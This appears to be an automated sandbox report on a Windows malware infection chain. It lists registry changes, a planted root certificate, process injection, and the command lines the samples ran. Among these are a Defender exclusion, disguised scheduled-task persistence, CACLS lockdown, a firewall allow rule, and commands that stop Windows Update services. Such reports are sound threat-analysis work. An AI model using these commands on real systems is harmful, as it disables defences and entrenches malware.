Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\3414.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\3414.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2B2E.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3414.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2248 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2252 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 2628 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\SysWOW64\WerFault.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 1272 wrote to memory of 2300 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\819E.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2300 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\819E.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 2920 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 1272 wrote to memory of 2220 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\842E.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2476 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe
PID 2940 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe

"C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 284

C:\Users\Admin\AppData\Local\Temp\819E.exe

C:\Users\Admin\AppData\Local\Temp\819E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\842E.exe

C:\Users\Admin\AppData\Local\Temp\842E.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\869D.tmp\869E.tmp\869F.bat C:\Users\Admin\AppData\Local\Temp\85D5.bat"

C:\Users\Admin\AppData\Local\Temp\85D5.bat

"C:\Users\Admin\AppData\Local\Temp\85D5.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 280

C:\Users\Admin\AppData\Local\Temp\897E.exe

C:\Users\Admin\AppData\Local\Temp\897E.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 132

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\8CE8.exe

C:\Users\Admin\AppData\Local\Temp\8CE8.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3024 CREDAT:340993 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\8EDC.exe

C:\Users\Admin\AppData\Local\Temp\8EDC.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1444 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\C47D.exe

C:\Users\Admin\AppData\Local\Temp\C47D.exe

C:\Users\Admin\AppData\Local\Temp\1C5E.exe

C:\Users\Admin\AppData\Local\Temp\1C5E.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {A569FB2E-AC63-4F85-9D61-B1FE97CAC294} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\2B2E.exe

C:\Users\Admin\AppData\Local\Temp\2B2E.exe

C:\Users\Admin\AppData\Local\Temp\3414.exe

C:\Users\Admin\AppData\Local\Temp\3414.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1444 CREDAT:209935 /prefetch:2

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010231327.log C:\Windows\Logs\CBS\CbsPersist_20231010231327.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

